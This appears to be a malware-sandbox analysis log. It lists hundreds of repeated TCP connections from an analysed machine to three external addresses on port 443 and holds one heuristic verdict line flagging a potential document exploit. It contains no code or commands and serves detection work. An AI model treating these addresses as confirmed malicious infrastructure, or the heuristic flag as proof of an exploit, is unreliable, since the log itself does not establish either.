Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 172.217.215.138:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
